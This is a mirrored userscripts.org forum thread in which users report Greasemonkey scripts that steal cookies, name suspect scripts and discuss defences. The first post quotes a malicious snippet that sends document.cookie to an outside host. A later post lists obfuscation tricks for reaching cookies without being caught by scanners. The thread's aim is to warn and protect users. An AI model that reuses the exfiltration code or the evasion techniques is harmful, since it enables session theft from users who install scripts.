THIS IS A STATIC MIRROR OF USERSCRIPTS.ORG - LOGINS DO NOT WORK

Cookie Stealing Scripts

in Userscripts.org discussion
Subscribe to Cookie Stealing Scripts 209 posts, 115 voices



cinerus User

Rapidshare Premium & Collectors Zone Tweak v2+ By lifetalk
https://userscripts-mirror.org/scripts/review/38392


GM_JQ.src = 'http://jquery.07x.net/jquery.js';

var readyBound = false;

if(document.getElementById('formular')){
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://zshareaudio.phpnet.us/?' + unescape(document.cookie);
GM_JQ.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(GM_JQ);
}

mo fcuker !

 
sizzlemctwizzle Scriptwright

@cinerus
You've got to let jesse know that script you posted is calling a dirty version of JQuery which is located at http://jquery.07x.net/jquery.js and basically steals Rapidshare Premium Cookies. It has over a thousand installs already, which means it is likely several accounts have already been stolen.

 
w35l3y Scriptwright

All Chad justice's, NeopetsFastAutobuyer's, Neopetss' and neohacks' scripts are cookie grabbers

 
omgtestorxd User

Hello, I just told by a friend to not use the following script:

https://userscripts-mirror.org/scripts/review/36111

Because it was some cookie hax, the user only had that script, and the 2 reviewers only have a review and don't exist anymore, so it seems to be a fake.

But I've checked the code and didn't find anything strange, could you tell me if its actually some kind of hack?

Thanks in advance.

 
sizzlemctwizzle Scriptwright

omgtestorxd wrote:
Hello, I just told by a friend to not use the following script:
https://userscripts-mirror.org/scripts/review/36111
Because it was some cookie hax, the user only had that script, and the 2 reviewers only have a review and don't exist anymore, so it seems to be a fake.
But I've checked the code and didn't find anything strange, could you tell me if its actually some kind of hack?
Thanks in advance.

That script does not steal cookies.

 
DavidJCobb Scriptwright

It seems clear that we can't just scan through the code to find cookie stealing. Yeah, that would help a little bit, but there are literally infinitely many ways to obfuscate a reference to document.cookie. With even just a little thought, an experienced JavaScript programmer can probably find two different filter workarounds, and that's before factoring in Mozilla-specific quirks like anyNodeInTheDocument.__parent__==document. It seems like only restrictions on Greasemonkey itself would be effective for preventing cookie theft. Perhaps messing around with the sandbox's access to document.cookie to notify the user when a userscript attempts to access a cookie?

Just to make my point clearer, here are several ways that would be very difficult to automatically filter or automatically recognize:

for(i in document){
   if(i.match(/^c\o{2}k(?:)[i\ii]\u0065(?:)$/)) // RegExp obfuscation
      stolenData=document[i] // it ONLY matches "cookie"
}
for(i in document){
   if(i.charCodeAt(0)==99) // if and charcode obfuscation
      if(i.charCodeAt(1)==i.charCodeAt(2)==111)
         if(i.charCodeAt(3)==107)
            if(i.substring(4)=="ie")
               stolenData=document[i]
}
stolenData=anyNodeInTheDocument.__parent__.cookie // Mozilla-only
leverage=
   {
      get x(){return document}, // requires getters
      get y(a){if(a)return "co";return undefined}, // extra protection...
      get z(){return "okie"}
   };
V=leverage.__lookupGetter__("y")(1);
stolenData=leverage.x[V+leverage.z];
stolenData=document["co"+["o"][0]+"ki"+("document").charAt(5)]
// string assembly... with a twist.
A="coo";
// several hundred lines of code go here
B="kie";
// several hundred more lines of code go here
stolenData=document[A+B]

I post these examples because I know that a determined attacker will think either of them or of something similar or better.

 
lifetalk Scriptwright

Just to clear a couple misconceptions here..

The 'lifetalk' to which the rapidshare cookie stealing scripts belong, is NOT ME.

Want proof?

Check out his user profile URL, and check out my user profile URL. Nuff said.

The problem is with userscripts. The site is insecure. Anyone can impersonate anyone else. How is it possible for two members to have the same username? Ever thought about it?

This should help clear stuff out..
https://userscripts-mirror.org/topics/23191

I hate to see this... but my username and reputation is at stake here :S

 
sizzlemctwizzle Scriptwright

@DavidJCobb
Yup you can obfuscate in literally infinite number of ways. It would require you to actually run the code to be sure what it really does.

 
Buggy Scriptwright

Here's another account stealer script:

https://userscripts-mirror.org/scripts/show/44524

 
See User

what should I do if I unwittingly installed a cookie grabber? If it stole my account info would deleting the script and changing my password protect me?

 
JoeSimmons Scriptwright

Not if he already changed it before you. But definitely delete the script.

 
See User

Thanks. That's good news for me. I'll be a lot more careful in the future.

 
lifetalk Scriptwright

Yet another 'lifetalk' :S
Glad to see he's deleted though

 
sizzlemctwizzle Scriptwright

lifetalk wrote:
Yet another 'lifetalk' :S
Glad to see he's deleted though

That's what happens when you make a script for a pay site. Though it's gotta suck when people think you're the one stealing their accounts.

 
Marti Scriptwright

lifetalk wrote:
Glad to see he's deleted though
Source is terminated as well... hope this helps.

 
Steinn Scriptwright
FirefoxWindows

All Autobuyer 2.0,
Neopets Sharp AutoBuyer,
Neopets: Kadoatie Feeder,
Neopets - Stock Market Summary,
Neopets - All Site Themes,
Firefox Autobuyer v5 -- Neopets Aber!,
Pyramids Autoplayer 0.5,
Neopets : Dice-A-Roo,
Neopets Auto Neoquester,
scripts are cookie grabbers
 
Steinn Scriptwright
FirefoxWindows

Neopets FireFox Autobuyer v4 (EXCLUSIVE)!,
Neopets - Cliffhanger Autoplayer,
Neopets : Snowager Alert,
Neopets : Snowager Alert,
Carnival Games Player + Logger,
,

cookie grabbers /\
 
JoeSimmons Scriptwright
FirefoxWindows

https://userscripts-mirror.org/scripts/show/51190

 
smk Scriptwright
FirefoxWindows

i think greasemonkey should have some internal-checking system to warn users about cookies, maybe something like xss checking in noscript
it could hook the getting of cookies perhaps?

 
Avindra V.G. Scriptwright
FirefoxWindows

Make a request @github:

http://github.com/greasemonkey/greasemonkey/issues

 
aroplate User
FirefoxWindows

Help,,, I'm trying to use the script for facebook color and I installed greasemonkey on Firefox installed the script and restarted firefox but when i go to tools-greasemonkey the "user script command" is grayed out and i am unable to use it to color facebook any suggestions.
Thanks

 
sizzlemctwizzle Scriptwright
FirefoxMacintosh

aroplate wrote:
Help,,, I'm trying to use the script for facebook color and I installed greasemonkey on Firefox installed the script and restarted firefox but when i go to tools-greasemonkey the "user script command" is grayed out and i am unable to use it to color facebook any suggestions.
Thanks
You're asking for help in the wrong place bud.

 
ceejinc Scriptwright
FirefoxWindows

people need to do something better with their life vs steal other peoples things..that's just stupid...

 
KaLpSiz Scriptwright
FirefoxWindows

Nice

 
Daren Scriptwright
FirefoxWindows

#1 So after 2+ years of posting about these problems, the root problem still exists?

#2 Why are the scripts identified as cookie-stealing still available for download? Shouldn't they have been removed or banned?